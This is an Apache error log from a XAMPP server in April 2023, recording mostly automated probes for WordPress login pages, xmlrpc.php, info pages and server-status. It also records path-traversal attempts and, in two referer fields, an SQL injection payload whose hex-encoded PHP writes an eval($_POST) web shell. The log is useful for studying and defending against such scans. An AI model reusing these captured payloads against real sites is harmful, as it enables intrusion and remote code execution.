[Sun Apr 09 02:09:42.489204 2023] [php:error] [pid 6504:tid 3620] [client 64.227.176.217:38380] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Sun Apr 09 05:29:49.055859 2023] [php:error] [pid 6504:tid 3608] [client 51.222.97.96:52252] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://ucp.vn-rp.cz
[Sun Apr 09 05:29:49.441782 2023] [php:error] [pid 6504:tid 3608] [client 51.222.97.96:52262] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.ucp.vn-rp.cz
[Sun Apr 09 06:23:15.095725 2023] [php:error] [pid 6504:tid 3596] [client 209.141.51.44:49550] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 06:23:31.808702 2023] [php:error] [pid 6504:tid 3596] [client 209.141.51.44:55618] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 10:56:05.279116 2023] [php:error] [pid 6504:tid 3604] [client 209.141.37.166:56244] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 11:43:45.711842 2023] [php:error] [pid 6504:tid 3608] [client 59.11.214.75:52606] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://board.vn-rp.cz
[Sun Apr 09 11:43:50.802757 2023] [php:error] [pid 6504:tid 3608] [client 59.11.214.75:56128] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.board.vn-rp.cz
[Sun Apr 09 16:20:22.400150 2023] [php:error] [pid 11500:tid 3604] [client 198.12.253.60:33796] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 16:45:01.115809 2023] [php:error] [pid 11500:tid 3604] [client 107.189.10.254:60744] script 'C:/xampp/htdocs/default/wp-comments-post.php' not found or unable to stat, referer: http://89.190.84.12
[Sun Apr 09 16:45:01.116773 2023] [php:error] [pid 11500:tid 3604] [client 107.189.10.254:60744] script 'C:/xampp/htdocs/default/wp-comments-post.php' not found or unable to stat, referer: http://89.190.84.12
[Sun Apr 09 17:03:52.675056 2023] [php:error] [pid 11500:tid 3612] [client 185.165.118.34:40884] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 17:05:04.743829 2023] [php:error] [pid 11500:tid 3604] [client 113.161.116.20:40028] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 17:26:23.613638 2023] [php:error] [pid 11500:tid 3572] [client 161.35.167.190:38890] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 18:25:26.020492 2023] [php:error] [pid 11500:tid 3580] [client 80.91.49.92:52604] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 18:49:23.234478 2023] [php:error] [pid 11500:tid 3620] [client 216.158.226.180:33598] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 18:49:31.620119 2023] [php:error] [pid 11500:tid 3620] [client 139.59.10.149:13880] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 19:09:42.955011 2023] [php:error] [pid 11500:tid 3604] [client 23.97.205.210:56518] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://mta-sts.mail.fphosting.eu
[Sun Apr 09 19:09:43.130003 2023] [php:error] [pid 11500:tid 3604] [client 23.97.205.210:56576] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.mta-sts.mail.fphosting.eu
[Sun Apr 09 19:19:44.288829 2023] [php:error] [pid 11500:tid 3604] [client 162.0.220.49:32896] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 19:22:57.278638 2023] [php:error] [pid 11500:tid 3580] [client 37.200.66.139:34460] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 19:51:30.852709 2023] [php:error] [pid 11500:tid 3640] [client 103.101.225.11:51042] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 20:06:10.944691 2023] [php:error] [pid 11500:tid 3648] [client 171.244.49.8:48966] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 20:48:46.203205 2023] [php:error] [pid 11500:tid 3632] [client 103.139.75.87:3880] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 21:00:32.659196 2023] [php:error] [pid 11500:tid 3632] [client 159.65.131.45:37216] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://admin.fphosting.eu
[Sun Apr 09 21:00:33.227049 2023] [php:error] [pid 11500:tid 3632] [client 159.65.131.45:37226] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.admin.fphosting.eu
[Sun Apr 09 21:16:14.525854 2023] [php:error] [pid 11500:tid 3632] [client 190.145.68.131:45562] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 21:32:50.048948 2023] [php:error] [pid 11500:tid 3580] [client 136.243.219.190:35490] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 21:54:42.751241 2023] [php:error] [pid 11500:tid 3632] [client 41.231.54.187:51926] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 22:13:09.088519 2023] [php:error] [pid 11500:tid 3640] [client 166.62.122.244:44560] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Sun Apr 09 23:11:54.163297 2023] [php:error] [pid 11500:tid 3640] [client 139.59.31.218:33246] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://terms.fpproduction.eu
[Sun Apr 09 23:11:54.554253 2023] [php:error] [pid 11500:tid 3640] [client 139.59.31.218:33306] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.terms.fpproduction.eu
[Mon Apr 10 02:11:45.016666 2023] [php:error] [pid 11500:tid 3648] [client 194.169.175.26:57159] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Mon Apr 10 03:03:37.934287 2023] [php:error] [pid 11500:tid 3564] [client 79.110.62.245:54916] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Apr 10 10:32:55.472988 2023] [php:error] [pid 11500:tid 3580] [client 203.56.198.37:61469] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 10 11:12:25.858115 2023] [php:error] [pid 11500:tid 3564] [client 20.210.183.226:49568] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Apr 10 11:34:47.156665 2023] [php:error] [pid 11500:tid 3548] [client 38.60.204.44:56325] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Mon Apr 10 11:34:47.328597 2023] [authz_core:error] [pid 11500:tid 3548] [client 38.60.204.44:56325] AH01630: client denied by server configuration: C:/xampp/phpMyAdmin/index.php
[Mon Apr 10 12:43:59.262141 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49241] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://www.fpproduction.eu/index.php?m=member&c=index&a=register&siteid=1
[Mon Apr 10 12:43:59.478195 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49241] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://www.fpproduction.eu/index.php/api/Uploadify/preview
[Mon Apr 10 12:43:59.505193 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49241] script 'C:/xampp/htdocs/default/user.php' not found or unable to stat, referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:288:"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:3:"'/*";}
[Mon Apr 10 12:43:59.532190 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49241] script 'C:/xampp/htdocs/default/fdgq.php' not found or unable to stat, referer: http://www.fpproduction.eu/fdgq.php
[Mon Apr 10 12:43:59.594772 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49241] script 'C:/xampp/htdocs/default/hgrxr.php' not found or unable to stat, referer: http://www.fpproduction.eu/hgrxr.php
[Mon Apr 10 12:43:59.621555 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49241] script 'C:/xampp/htdocs/default/user.php' not found or unable to stat, referer: 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:297:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A336C7A655846784C6E426F634363734A7A772F63476877494756325957776F4A46395154314E5557336C7A655630704F79412F506963702729293B2F2F7D787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953a
[Mon Apr 10 12:43:59.648536 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49241] script 'C:/xampp/htdocs/default/ysyqq.php' not found or unable to stat, referer: http://www.fpproduction.eu/ysyqq.php
[Mon Apr 10 12:43:59.711164 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49241] script 'C:/xampp/htdocs/default/asdcf.php' not found or unable to stat, referer: http://www.fpproduction.eu/asdcf.php
[Mon Apr 10 12:43:59.872263 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49769] script 'C:/xampp/htdocs/default/search.php' not found or unable to stat, referer: http://www.fpproduction.eu/search.php
[Mon Apr 10 12:43:59.900262 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49769] script 'C:/xampp/htdocs/default/search.php' not found or unable to stat, referer: http://www.fpproduction.eu/search.php?searchtype=5
[Mon Apr 10 12:43:59.927262 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49769] script 'C:/xampp/htdocs/default/search.php' not found or unable to stat, referer: http://www.fpproduction.eu/search.php?searchtype=5
[Mon Apr 10 12:43:59.955248 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49769] script 'C:/xampp/htdocs/default/index.PHP' not found or unable to stat, referer: http://www.fpproduction.eu/index.PHP?m=vod-search
[Mon Apr 10 12:43:59.982448 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49769] script 'C:/xampp/htdocs/default/c.php' not found or unable to stat, referer: http://www.fpproduction.eu/c.php
[Mon Apr 10 12:44:00.036259 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49769] script 'C:/xampp/htdocs/default/search.php' not found or unable to stat, referer: http://www.fpproduction.eu/search.php
[Mon Apr 10 12:44:00.063259 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:49769] script 'C:/xampp/htdocs/default/search.php' not found or unable to stat, referer: http://www.fpproduction.eu/search.php
[Mon Apr 10 12:44:01.133043 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:50835] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://www.fpproduction.eu/index.php/?s=captcha
[Mon Apr 10 12:44:01.159555 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:50835] script 'C:/xampp/htdocs/default/mysql.bak.php' not found or unable to stat, referer: http://www.fpproduction.eu/mysql.bak.php
[Mon Apr 10 12:44:01.185555 2023] [php:error] [pid 11500:tid 3612] [client 51.103.219.212:50835] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat, referer: http://www.fpproduction.eu/index.php
[Mon Apr 10 13:49:58.722368 2023] [php:error] [pid 11500:tid 3648] [client 20.187.107.58:56312] script 'C:/xampp/htdocs/default/xmlrpc.php' not found or unable to stat
[Mon Apr 10 14:43:30.645746 2023] [core:error] [pid 11500:tid 3620] [client 185.180.143.137:57088] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Mon Apr 10 14:43:30.693745 2023] [core:error] [pid 11500:tid 3620] [client 185.180.143.137:57192] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Mon Apr 10 14:43:30.744744 2023] [core:error] [pid 11500:tid 3620] [client 185.180.143.137:57272] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Mon Apr 10 17:48:43.775326 2023] [core:error] [pid 11500:tid 3572] [client 185.180.143.8:38746] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Mon Apr 10 17:48:44.020505 2023] [core:error] [pid 11500:tid 3572] [client 185.180.143.8:39182] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Mon Apr 10 17:48:44.354434 2023] [core:error] [pid 11500:tid 3572] [client 185.180.143.8:39352] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Mon Apr 10 18:43:18.138063 2023] [php:error] [pid 11500:tid 3664] [client 15.235.55.74:50478] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Mon Apr 10 19:09:01.639022 2023] [php:error] [pid 11500:tid 3620] [client 207.154.225.47:52032] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Mon Apr 10 19:09:01.639022 2023] [authz_core:error] [pid 11500:tid 3548] [client 207.154.225.47:52018] AH01630: client denied by server configuration: C:/xampp/htdocs/default/server-status
[Tue Apr 11 00:16:02.485961 2023] [php:error] [pid 11500:tid 3604] [client 143.198.164.4:57566] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://baze.fphosting.eu
[Tue Apr 11 00:16:02.952958 2023] [php:error] [pid 11500:tid 3604] [client 143.198.164.4:57574] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.baze.fphosting.eu
[Tue Apr 11 16:21:51.280645 2023] [php:error] [pid 11500:tid 3580] [client 45.55.135.165:36122] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://speedtest.fphosting.eu.prod.hosts.ooklaserver.net
[Tue Apr 11 18:12:26.507804 2023] [php:error] [pid 11500:tid 3580] [client 66.29.134.110:51908] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 18:16:23.881162 2023] [php:error] [pid 11500:tid 3580] [client 75.119.218.236:57564] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 19:33:00.558647 2023] [php:error] [pid 11500:tid 3632] [client 165.227.4.198:41046] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 19:46:20.152165 2023] [php:error] [pid 11500:tid 3564] [client 159.223.95.240:49766] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 20:24:32.456488 2023] [php:error] [pid 11500:tid 3632] [client 97.74.82.234:45438] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 20:48:17.683092 2023] [php:error] [pid 11500:tid 3632] [client 144.91.125.73:37102] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 22:04:47.476050 2023] [php:error] [pid 11500:tid 3548] [client 46.165.203.33:44896] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://emily.fphosting.eu
[Tue Apr 11 22:04:47.554065 2023] [php:error] [pid 11500:tid 3548] [client 46.165.203.33:44910] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.emily.fphosting.eu
[Tue Apr 11 22:40:51.127512 2023] [php:error] [pid 11500:tid 3664] [client 177.55.116.247:49238] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 22:43:09.470216 2023] [php:error] [pid 11500:tid 3620] [client 87.208.123.168:36342] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.terms.fpproduction.eu
[Tue Apr 11 22:47:10.040154 2023] [php:error] [pid 11500:tid 3664] [client 139.144.23.5:50740] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 23:12:26.867854 2023] [php:error] [pid 11500:tid 3548] [client 1.14.77.81:55089] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Tue Apr 11 23:16:39.900690 2023] [php:error] [pid 11500:tid 3548] [client 46.101.73.109:25066] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://system.fphosting.eu
[Tue Apr 11 23:16:39.991688 2023] [php:error] [pid 11500:tid 3548] [client 46.101.73.109:25086] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.system.fphosting.eu
[Wed Apr 12 00:45:28.794943 2023] [php:error] [pid 11500:tid 3548] [client 20.106.186.196:41138] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 00:56:17.295411 2023] [php:error] [pid 11500:tid 3572] [client 103.174.10.83:59864] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 03:20:24.873204 2023] [php:error] [pid 11500:tid 3564] [client 88.160.142.224:10105] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://baze.fphosting.eu
[Wed Apr 12 03:20:24.996224 2023] [php:error] [pid 11500:tid 3564] [client 88.160.142.224:3588] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.baze.fphosting.eu
[Wed Apr 12 06:00:30.170115 2023] [php:error] [pid 11500:tid 3548] [client 92.81.30.47:34172] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 07:28:41.288047 2023] [php:error] [pid 11500:tid 3632] [client 178.128.217.45:51634] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Wed Apr 12 10:48:12.534713 2023] [php:error] [pid 11500:tid 3572] [client 83.240.221.24:14201] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://payments.fphosting.eu
[Wed Apr 12 10:48:12.906011 2023] [php:error] [pid 11500:tid 3572] [client 83.240.221.24:7862] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.payments.fphosting.eu
[Wed Apr 12 15:11:49.166930 2023] [php:error] [pid 11500:tid 3548] [client 35.216.166.62:41858] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Wed Apr 12 15:11:49.284914 2023] [authz_core:error] [pid 11500:tid 3548] [client 35.216.166.62:41886] AH01630: client denied by server configuration: C:/xampp/htdocs/default/server-status
[Wed Apr 12 16:55:12.990568 2023] [php:error] [pid 11500:tid 3564] [client 103.101.225.11:40166] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 17:33:23.813226 2023] [php:error] [pid 11500:tid 3564] [client 103.154.185.167:35832] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 18:02:17.174736 2023] [php:error] [pid 11500:tid 3572] [client 103.145.50.172:40228] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 18:22:46.751466 2023] [php:error] [pid 11500:tid 3548] [client 47.90.137.113:59554] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 18:45:58.067116 2023] [php:error] [pid 11500:tid 3664] [client 148.72.244.254:44142] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 19:56:25.814285 2023] [php:error] [pid 11500:tid 3504] [client 3.236.245.15:57234] script 'C:/xampp/htdocs/default/gate.php' not found or unable to stat
[Wed Apr 12 20:04:51.238217 2023] [php:error] [pid 11500:tid 3520] [client 103.171.181.149:38370] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 20:45:10.428173 2023] [php:error] [pid 11500:tid 3556] [client 199.167.138.128:46870] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 21:00:31.851607 2023] [php:error] [pid 11500:tid 3556] [client 103.195.246.104:44404] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 21:05:47.890308 2023] [php:error] [pid 11500:tid 3556] [client 41.76.111.46:47339] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 21:13:28.176018 2023] [php:error] [pid 11500:tid 3492] [client 49.232.28.107:35738] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 21:15:21.531242 2023] [php:error] [pid 11500:tid 3492] [client 5.2.65.119:48256] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 21:23:39.439962 2023] [php:error] [pid 11500:tid 3492] [client 162.55.82.145:50932] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 21:24:27.240580 2023] [php:error] [pid 11500:tid 3492] [client 51.15.160.148:40142] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 21:25:27.620895 2023] [php:error] [pid 11500:tid 3492] [client 185.146.20.254:47154] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 21:26:10.796827 2023] [core:error] [pid 11500:tid 3520] [client 185.180.143.6:38178] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png)
[Wed Apr 12 21:26:11.275942 2023] [core:error] [pid 11500:tid 3520] [client 185.180.143.6:38606] AH10244: invalid URI path (/icons/.%2e/%2e%2e/apache2/icons/sphere1.png)
[Wed Apr 12 21:26:11.515559 2023] [core:error] [pid 11500:tid 3520] [client 185.180.143.6:39000] AH10244: invalid URI path (/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png)
[Wed Apr 12 21:49:09.987523 2023] [php:error] [pid 11500:tid 3508] [client 66.249.70.221:55913] script 'C:/xampp/htdocs/default/index.php' not found or unable to stat
[Wed Apr 12 21:49:11.102062 2023] [php:error] [pid 11500:tid 3520] [client 66.249.70.218:58367] script 'C:/xampp/htdocs/default/fdgq.php' not found or unable to stat
[Wed Apr 12 21:49:11.397189 2023] [php:error] [pid 11500:tid 3508] [client 66.249.70.221:55913] script 'C:/xampp/htdocs/default/asdcf.php' not found or unable to stat
[Wed Apr 12 22:52:18.981573 2023] [php:error] [pid 11500:tid 3520] [client 83.150.215.90:56588] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 23:12:55.981156 2023] [php:error] [pid 11500:tid 3520] [client 136.243.219.190:59476] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Wed Apr 12 23:35:22.187069 2023] [php:error] [pid 11500:tid 3520] [client 165.73.83.239:40542] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 00:20:23.231981 2023] [php:error] [pid 11500:tid 3572] [client 103.171.181.149:43036] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 00:26:30.870324 2023] [php:error] [pid 11500:tid 3496] [client 15.235.55.74:35250] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 00:34:07.321954 2023] [php:error] [pid 11500:tid 3496] [client 194.113.235.171:55594] script 'C:/xampp/htdocs/default/666.php' not found or unable to stat, referer: http://fphosting.eu/666.php
[Thu Apr 13 00:34:08.248694 2023] [php:error] [pid 11500:tid 3496] [client 194.113.235.171:41907] script 'C:/xampp/htdocs/default/666.php' not found or unable to stat, referer: http://fpproduction.eu/666.php
[Thu Apr 13 01:03:42.185419 2023] [php:error] [pid 11500:tid 3496] [client 109.234.162.23:59460] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 01:39:13.785757 2023] [php:error] [pid 11500:tid 3572] [client 61.19.247.160:41946] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 02:22:39.793517 2023] [php:error] [pid 11500:tid 3508] [client 101.99.90.175:52800] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 05:19:10.443372 2023] [php:error] [pid 11500:tid 3508] [client 66.249.70.218:40569] script 'C:/xampp/htdocs/default/c.php' not found or unable to stat
[Thu Apr 13 06:35:38.335578 2023] [php:error] [pid 11500:tid 3492] [client 159.89.168.107:40398] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Thu Apr 13 06:40:45.399629 2023] [php:error] [pid 11500:tid 3492] [client 148.72.244.147:43264] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 11:08:48.520345 2023] [php:error] [pid 11500:tid 3508] [client 143.198.197.109:47248] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://mta-sts.fphosting.eu
[Thu Apr 13 11:08:49.118006 2023] [php:error] [pid 11500:tid 3508] [client 143.198.197.109:47252] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.mta-sts.fphosting.eu
[Thu Apr 13 14:37:09.376994 2023] [php:error] [pid 11500:tid 3520] [client 45.55.135.165:40026] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://fpproduction.eu
[Thu Apr 13 14:37:09.630327 2023] [php:error] [pid 11500:tid 3520] [client 45.55.135.165:40084] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.fpproduction.eu
[Thu Apr 13 16:18:27.297345 2023] [php:error] [pid 11500:tid 3496] [client 185.154.13.79:53344] script 'C:/xampp/htdocs/default/go.php' not found or unable to stat
[Thu Apr 13 17:20:10.945930 2023] [php:error] [pid 11500:tid 3496] [client 45.119.84.18:46206] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 18:21:29.461740 2023] [php:error] [pid 11500:tid 3476] [client 14.18.80.54:58437] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Thu Apr 13 20:36:13.204693 2023] [php:error] [pid 11500:tid 3136] [client 178.128.253.113:42450] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://sys.vn-rp.cz
[Thu Apr 13 20:36:13.330549 2023] [php:error] [pid 11500:tid 3136] [client 178.128.253.113:42462] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.sys.vn-rp.cz
[Thu Apr 13 21:01:19.765355 2023] [php:error] [pid 11500:tid 3252] [client 66.249.64.206:50636] script 'C:/xampp/htdocs/default/666.php' not found or unable to stat
[Thu Apr 13 23:11:41.222322 2023] [php:error] [pid 11500:tid 3008] [client 46.101.73.109:12888] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://mta-sts.mx.fphosting.eu
[Thu Apr 13 23:11:41.325036 2023] [php:error] [pid 11500:tid 3008] [client 46.101.73.109:12902] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.mta-sts.mx.fphosting.eu
[Thu Apr 13 23:18:11.701067 2023] [php:error] [pid 11500:tid 3452] [client 139.59.102.162:52546] script 'C:/xampp/htdocs/default/upl.php' not found or unable to stat
[Fri Apr 14 00:29:20.953409 2023] [php:error] [pid 11500:tid 3588] [client 92.223.86.19:5139] script 'C:/xampp/htdocs/default/style.php' not found or unable to stat
[Fri Apr 14 02:37:56.348059 2023] [core:error] [pid 11500:tid 3008] [client 80.66.77.239:52004] AH10244: invalid URI path (/../../mnt/mtd/Config/Account1)
[Fri Apr 14 08:11:45.170091 2023] [php:error] [pid 11500:tid 3252] [client 34.221.197.9:63464] script 'C:/xampp/htdocs/default/phpinfo.php' not found or unable to stat
[Fri Apr 14 08:11:48.270231 2023] [php:error] [pid 11500:tid 3252] [client 34.221.197.9:63080] script 'C:/xampp/htdocs/default/php.php' not found or unable to stat
[Fri Apr 14 08:11:49.697744 2023] [php:error] [pid 11500:tid 3252] [client 34.221.197.9:62001] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Fri Apr 14 08:37:09.712462 2023] [authz_core:error] [pid 11500:tid 3640] [client 178.62.73.12:35354] AH01630: client denied by server configuration: C:/xampp/htdocs/default/server-status
[Fri Apr 14 08:37:09.720525 2023] [php:error] [pid 11500:tid 3148] [client 178.62.73.12:35368] script 'C:/xampp/htdocs/default/info.php' not found or unable to stat
[Fri Apr 14 10:43:19.741920 2023] [cgi:error] [pid 11500:tid 3252] [client 158.255.82.57:53665] AH02811: script not found or unable to stat: C:/xampp/htdocs/default/setup.cgi
[Fri Apr 14 12:35:30.382125 2023] [php:error] [pid 11500:tid 3640] [client 180.188.198.223:50574] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 16:07:32.498011 2023] [php:error] [pid 11500:tid 3452] [client 199.167.138.128:49278] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 16:12:27.041956 2023] [php:error] [pid 11500:tid 3280] [client 109.234.162.23:47786] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat
[Fri Apr 14 16:14:14.342634 2023] [php:error] [pid 11500:tid 3452] [client 23.97.205.210:54258] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://admin.fphosting.eu
[Fri Apr 14 16:14:14.599273 2023] [php:error] [pid 11500:tid 3452] [client 23.97.205.210:54332] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://blog.admin.fphosting.eu
[Fri Apr 14 17:22:20.185460 2023] [php:error] [pid 11500:tid 3252] [client 217.234.78.169:44894] script 'C:/xampp/htdocs/default/wp-login.php' not found or unable to stat, referer: http://doma.fphosting.eu
